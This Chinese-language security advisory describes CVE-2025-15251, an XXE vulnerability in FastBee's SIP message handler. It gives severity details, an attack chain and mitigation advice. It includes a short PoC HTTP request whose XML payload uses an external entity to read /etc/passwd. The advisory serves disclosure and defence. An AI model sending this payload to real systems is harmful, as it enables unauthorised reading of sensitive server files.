CVE-2025-15251 CVSS 5.6 中危

CVE-2025-15251 FastBee XXE漏洞

披露日期: 2025-12-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-15251

漏洞类型

XXE

CVSS评分

5.6 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

beecue FastBee

漏洞概述

FastBee是一套物联网系统。FastBee 2.1及之前版本在SIP消息处理组件中存在XML外部实体引用（XXE）漏洞。攻击者可通过构造恶意的XML请求，利用getRootElement函数读取系统敏感文件或进行端口扫描等攻击。

技术细节

漏洞存在于springboot/fastbee-server/sip-server/src/main/java/com/fastbee/sip/handler/req/ReqAbstractHandler.java文件的getRootElement函数中，该函数在处理SIP消息时未对XML输入进行安全验证，导致攻击者可注入外部实体引用。

攻击链分析

STEP 1

攻击者构造恶意XML请求，包含外部实体引用

STEP 2

请求被getRootElement函数处理

STEP 3

XML解析器解析外部实体，读取敏感文件

STEP 4

攻击者获取系统敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

POST /sip/handler HTTP/1.1
Host: target
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

影响范围

beecue FastBee <= 2.1

防御指南

临时缓解措施

立即升级FastBee系统到最新版本，或在SIP消息处理前对XML输入进行严格的安全验证。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15251
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15251
3 Details https://www.cvedetails.com/cve/CVE-2025-15251/
4 VulDB https://vuldb.com/cve/CVE-2025-15251
5 Link https://gitee.com/beecue/fastbee/issues/ID7HNZ
6 Link https://gitee.com/beecue/fastbee/issues/ID7HNZ#note_47777408_link
7 Link https://vuldb.com/?ctiid.338641
8 Link https://vuldb.com/?id.338641

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表